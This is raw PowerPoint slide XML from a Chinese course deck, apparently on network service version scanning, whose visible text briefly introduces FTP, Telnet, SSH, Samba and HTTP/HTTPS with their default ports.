            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="5704620" y="1074420"/>
            <a:ext cx="6064885" cy="5004435"/>
            <a:chOff x="6386452" y="1859239"/>
            <a:chExt cx="6637574" cy="5004435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="6080910" cy="5004435"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FTP服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FTP服务用于在两台计算机之间传输文件，是Internet中应用非常广泛的服务之一。它可根据实际需要设置各用户的使用权限，同时还具有跨平台的特性，即在 UNIX、Linux和Windows等操作系统中都可在FTP客户端和服务器之间实现文件的传输。FTP服务是网络中经常采用的资源共享方式之一，默认端口是21。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Telnet服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Telnet是一种应用层协议，用于互联网及局域网中。它使用虚拟终端机的形式，提供双向、以文字字符串为主的命令行接口交互功能，属于TCP/P协议族，是Internet远程登录服务的标准协议和主要方式，常用于服务器的远程控制，可供用户在本地主机运行远程主机上的工作，默认端口是23。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6386452" y="4489409"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="4509094"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5703985" y="1074420"/>
            <a:ext cx="6065520" cy="5004435"/>
            <a:chOff x="6385757" y="1859239"/>
            <a:chExt cx="6638269" cy="5004435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="6080910" cy="5004435"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SSH服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SSH是一种用于计算机之间加密登录的网络协议。在默认状态下，SSH 服务提供两种服务功能，一种是类似TeInet远程连接的服务，即 SSH服务，另一种是类似FTP服务的SFTP服务，借助SSH 协议来传输数据，以提供更安全的SFTP服务。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Samba服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Samba(SMB)主要用于Linux和 Windows 操作系统主机间的文件共享,也可用于Linux操作系统各主机之间的文件共享。Samba 服务器主要用于Windows 和 Linux 操作系统共存的网络中，Samba服务器类似这两个系统之间进行文件共享的桥梁，既可以看作共享服务器，也可以看作文件服务器。Http服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Http 协议的Web服务应用的默认端口为80，而Https 的默认端口为443，主要用于网银、支付等和钱相关的业务。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="3783924"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="3783924"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
